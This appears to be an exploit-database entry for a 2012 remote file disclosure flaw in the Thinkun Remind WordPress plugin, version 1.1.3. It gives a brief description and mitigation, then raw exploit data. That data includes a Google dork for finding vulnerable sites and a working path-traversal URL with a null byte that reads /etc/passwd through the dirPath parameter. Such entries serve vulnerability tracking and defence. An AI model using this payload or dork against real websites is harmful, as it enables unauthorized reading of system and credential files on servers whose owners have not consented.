header-logo
Suggest Exploit
vendor:
Thinkun Remind
by:
Sammy FORGIT
7,5
CVSS
HIGH
Remote File Disclosure
434
CWE
Product Name: Thinkun Remind
Affected Version From: 1.1.3
Affected Version To: 1.1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress:1.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Plugins – Thinkun Remind Remote File Disclosure Vulnerability

A remote file disclosure vulnerability exists in the Thinkun Remind plugin version 1.1.3 for Wordpress. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the exportData.php script, which is located in the plugin directory, with the dirPath parameter set to a file path. This will allow the attacker to view the contents of the file.

Mitigation:

Upgrade to the latest version of the Thinkun Remind plugin.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Thinkun Remind Remote File 
Disclosure Vulnerability
# Version : 1.1.3
# Link : http://wordpress.org/extend/plugins/thinkun-remind/
# Plugins : http://downloads.wordpress.org/plugin/thinkun-remind.1.1.3.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/thinkun-remind/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/thinkun-remind/exportData.php?dirPath=../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR